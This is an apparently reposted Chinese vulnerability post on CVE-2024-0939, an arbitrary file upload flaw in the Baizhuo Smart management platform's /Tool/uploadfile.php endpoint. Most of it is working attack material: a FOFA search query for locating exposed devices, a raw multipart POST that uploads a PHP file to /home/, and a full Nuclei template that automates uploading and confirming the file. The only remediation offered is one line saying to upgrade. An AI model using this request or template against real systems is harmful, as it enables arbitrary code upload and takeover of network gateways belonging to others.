热门标签
热门文章
- 1Educational Codeforces Round 100 (Rated for Div. 2) 题解_you are given an array [a1,a2,…,an] such that 1≤ai
- 2win10系统安装docker (2022年最新填坑)_win10安装docker
- 3随机森林回归算法讲解
- 4Xcode手动安装iOS模拟器_中国x站下载
- 5OpenAI DALL·E 3文生图模型技术揭秘(建议收藏)_最新多模块图生文架构
- 6分类预测 | Matlab实现OOA-CNN-SVM鱼鹰算法优化卷积支持向量机分类预测
- 7BLIP论文笔记
- 8谷歌员工年薪中位数近190万元!科技公司年薪排行,哪家强?
- 9Delphi:文本朗读器--文本转语音(基于百度TTS语音库)_delphi百度语音
- 10[数据结构]-哈希
当前位置: article > 正文
百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939)
作者:羊村懒王 | 2024-02-12 22:09:25
赞
踩
百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939)
免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Ⅰ、漏洞描述
百卓 Smart只管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。
百卓Smart管理平台 uploadfle.php 接口存在任意文件上传漏洞。恶意攻击者可能利用此漏洞上传而恶意文件,从而导致服务器失陷。
影响版本
smart_s210
smart_s210_firmware
Ⅱ、fofa语句
title="Smart管理平台"Ⅲ、漏洞复现
POC
- POST /Tool/uploadfile.php? HTTP/1.1
- Host: 127.0.0.1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Accept-Encoding: gzip, deflate
- Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
- Upgrade-Insecure-Requests: 1
- Connection: close
-
- -----------------------------13979701222747646634037182887
- Content-Disposition: form-data; name="file_upload"; filename="ceshi.php"
- Content-Type: application/octet-stream
-
- <?php echo md5('666');unlink(__FILE__);?>
- -----------------------------13979701222747646634037182887
- Content-Disposition: form-data; name="txt_path"
-
- /home/ceshi.php
- -----------------------------13979701222747646634037182887--
1、构建poc
2、访问
Ⅳ、Nuclei-POC
- id: Baizhuo-Smart-upload
-
- info:
- name: 百卓Smart管理平台 uploadfle.php 接口存在任意文件上传漏洞。恶意攻击者可能利用此漏洞上传而恶意文件,从而导致服务器失陷。
- author: WLF
- severity: high
- metadata:
- fofa-query: title="Smart管理平台"
- variables:
- filename: "{{to_lower(rand_base(10))}}"
- boundary: "{{to_lower(rand_base(20))}}"
- http:
- - raw:
- - |
- POST /Tool/uploadfile.php? HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Accept-Encoding: gzip, deflate
- Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
- Upgrade-Insecure-Requests: 1
- Connection: close
-
- -----------------------------13979701222747646634037182887
- Content-Disposition: form-data; name="file_upload"; filename="{{filename}}.php"
- Content-Type: application/octet-stream
-
- <?php echo md5('666');unlink(__FILE__);?>
- -----------------------------13979701222747646634037182887
- Content-Disposition: form-data; name="txt_path"
-
- /home/{{filename}}.php
- -----------------------------13979701222747646634037182887--
-
- - |
- GET /home/{{filename}}.php HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
-
-
- matchers:
- - type: dsl
- dsl:
- - status_code==200 && contains_all(body,"fae0b27c451c728867a567e8c1bb4e53")
Ⅴ、修复建议
升级至安全版本
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/羊村懒王/article/detail/78845
推荐阅读
相关标签
